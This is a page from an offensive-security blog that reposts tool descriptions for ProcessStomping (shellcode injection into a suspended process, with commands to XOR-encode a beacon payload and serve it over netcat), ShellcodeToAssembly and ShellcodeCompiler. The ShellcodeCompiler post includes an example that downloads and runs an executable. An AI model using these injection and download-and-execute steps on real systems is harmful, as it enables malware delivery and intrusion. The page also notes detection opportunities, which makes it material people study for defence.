Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label Shellcode. Show all posts
Showing posts with label Shellcode. Show all posts

Sunday, February 18, 2024

ProcessStomping - A Variation Of ProcessOverwriting To Execute Shellcode On An Executable'S Section


A variation of ProcessOverwriting to execute shellcode on an executable's section

What is it

For a more detailed explanation you can read my blog post

Process Stomping, is a variation of hasherezade’s Process Overwriting and it has the advantage of writing a shellcode payload on a targeted section instead of writing a whole PE payload over the hosting process address space.

These are the main steps of the ProcessStomping technique:

  1. CreateProcess - setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004) in order to suspend the processes primary thread.
  2. WriteProcessMemory - used to write each malicious shellcode to the target process section.
  3. SetThreadContext - used to point the entrypoint to a new code section that it has written.
  4. ResumeThread - self-explanatory.

As an example application of the technique, the PoC can be used with sRDI to load a beacon dll over an executable RWX section. The following picture describes the steps involved.


Disclaimer

All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.

Credits

This work has been made possible because of the knowledge and tools shared by Aleksandra Doniec @hasherezade and Nick Landers.

Usage

Select your target process and modify global variables accordingly in ProcessStomping.cpp.

Compile the sRDI project making sure that the offset is enough to jump over your generated sRDI shellcode blob and then update the sRDI tools:

cd \sRDI-master

python .\lib\Python\EncodeBlobs.py .\

Generate a Reflective-Loaderless dll payload of your choice and then generate sRDI shellcode blob:

python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

The shellcode blob can then be xored with a key-word and downloaded using a simple socket

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

Deliver the xored blob upon connection

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

The sRDI blob will get erased after execution to remove unneeded artifacts.

Caveats

To successfully execute this technique you should select the right target process and use a dll payload that doesn't come with a User Defined Reflective loader.

Detection opportunities

Process Stomping technique requires starting the target process in a suspended state, changing the thread's entry point, and then resuming the thread to execute the injected shellcode. These are operations that might be considered suspicious if performed in quick succession and could lead to increased scrutiny by some security solutions.



Share:

Tuesday, January 16, 2018

Transform your Shellcode to Assembly (ARM, ARM64, MIPS, PPC, X86) - ShellcodeToAssembly




Transform your Shellcode to Assembly (ARM, ARM64, MIPS, PPC, X86)

Replace in shellcodetoasm.py with your shellcode.
shellcode = ''

Installation
git clone https://github.com/blacknbunny/ShellcodeToAssembly.git && cd ShellcodeToAssembly/ && pip install -r requirements.txt && python2 shellcodetoasm.py

Modules manual installation
pip install -r requirements.txt
it can be
pip2 install -r requirements.txt

Usage
python2 shellcodetoasm.py [returnbit] [architecture]

For example
python2 shellcodetoasm.py 32 x86

Architectures
  • ARM
  • ARM64
  • MIPS
  • ppc
  • X86

Return Bit
  • 64
  • 32

Assembly Flavor
  • ATT
  • INTEL



Share:

Saturday, March 25, 2017

Shellcode C/C++ Compiler for Windows - ShellcodeCompiler



Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows. It is possible to call any Windows API function in a user-friendly way.

Shellcode Compiler takes as input a source file and it uses it's own compiler to interpret the code and generate an assembly file which is assembled with NASM ( http://www.nasm.us/ ).
Shellcode compiler was released at DefCamp security conference in Romania, November 2016.

Command line options
    -h (--help)      : Show this help message
    -v (--verbose)   : Print detailed output
    -t (--test)      : Test (execute) generated shellcode
    -r (--read)      : Read source code file
    -o (--output)    : Output file of the generated binary shellcode
    -a (--assembbly) : Output file of the generated assembly code

Source code example
    function URLDownloadToFileA("urlmon.dll");
    function WinExec("kernel32.dll");
    function ExitProcess("kernel32.dll");

    URLDownloadToFileA(0,"https://site.com/bk.exe","bk.exe",0,0);
    WinExec("bk.exe",0);
    ExitProcess(0);

Invocation example
    ShellcodeCompiler.exe -r Source.txt -o Shellcode.bin -a Assembly.asm

Limitations
  1. It is not possible to use the return value of an API call
  2. It is not possible to use pointers or buffers
  3. It is not possible to declare variables
All these limitations will be fixed as soon as possible. However, many other limitations will exist. This is an Alpha version. Please report any bugs or suggestions.


Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition